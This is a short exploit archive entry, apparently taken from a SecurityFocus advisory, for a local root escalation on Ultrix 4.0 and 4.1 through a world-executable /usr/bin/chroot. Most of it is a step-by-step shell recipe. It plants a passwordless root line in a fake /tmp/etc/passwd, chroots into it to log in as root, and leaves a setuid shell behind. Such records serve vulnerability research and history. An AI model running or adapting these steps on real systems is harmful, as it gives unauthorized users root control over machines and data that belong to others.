13 lines
No EOL
505 B
Text
Executable file
13 lines
No EOL
505 B
Text
Executable file
source: http://www.securityfocus.com/bid/17/info
|
|
|
|
By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.
|
|
|
|
$ mkdir /tmp/etc
|
|
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
|
|
$ mkdir /tmp/bin
|
|
$ cp /bin/sh /tmp/bin/sh
|
|
$ cp /bin/chmod /tmp/bin/chmod
|
|
$ chroot /tmp /bin/login
|
|
|
|
Then login as root with no password. chmod /tmp/bin/sh
|
|
to 4700, exit and run the suid /tmp/bin/sh. |